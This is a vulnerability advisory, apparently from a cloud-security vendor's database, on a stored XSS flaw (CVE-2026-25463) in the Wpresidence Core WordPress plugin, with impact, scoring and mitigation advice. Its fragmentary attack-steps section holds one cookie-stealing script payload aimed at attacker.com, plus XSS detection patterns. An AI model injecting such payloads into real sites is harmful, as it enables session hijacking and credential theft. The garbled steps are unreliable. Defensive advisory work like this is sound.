
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-25463 is a Stored Cross-Site Scripting (XSS) vulnerability in the WpEstate Wpresidence Core WordPress plugin. It affects all versions of the wpresidence-core plugin through 5.4.0 and is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation). The vulnerability was published on February 19, 2026, and carries a CVSS v3.1 base score of 6.5 (Medium) (Feedly).
The vulnerability stems from insufficient sanitization and escaping of user-supplied input before it is stored and rendered in web pages, classified as CWE-79 (Stored XSS). An authenticated attacker with low privileges can inject malicious JavaScript payloads through vulnerable input fields in the plugin, which are then persistently stored and executed in the browsers of other users who view the affected content. Exploitation requires user interaction (e.g., an administrator or other user visiting the page containing the injected payload), and the scope is changed, meaning the impact can extend beyond the vulnerable component itself (Feedly).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of other users' browsers, potentially leading to session hijacking, credential theft, unauthorized actions performed on behalf of victims, or defacement of site content. Because the payload is stored server-side, every user who visits the affected page is at risk without any further attacker interaction. The changed scope means that even users with elevated privileges (e.g., administrators) could be targeted, potentially enabling full site compromise (Feedly).
The vulnerability requires low-privilege authentication to exploit, reducing but not eliminating the barrier to attack. No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been identified at this time. The EPSS score is approximately 0.029% (0.000290), indicating a low probability of exploitation in the near term. It does not appear in the CISA Known Exploited Vulnerabilities (KEV) catalog (Feedly).
wpresidence-core plugin at version 5.4.0 or earlier using tools like WPScan or by inspecting plugin metadata in publicly accessible WordPress installations.<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the vulnerable field and save/submit the content.<script>, onerror=, onload=, etc.).wp_postmeta or custom plugin tables).wpresidence-core plugin, potentially carrying cookie or session data.Users should update the wpresidence-core plugin to a version beyond 5.4.0 that includes a patch for this vulnerability. Until a patched version is available or applied, administrators should restrict plugin input fields to trusted users only and consider using a Web Application Firewall (WAF) with XSS filtering rules to detect and block malicious payloads. Monitoring WordPress user activity and reviewing stored content for unexpected script tags is also advisable (Feedly).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."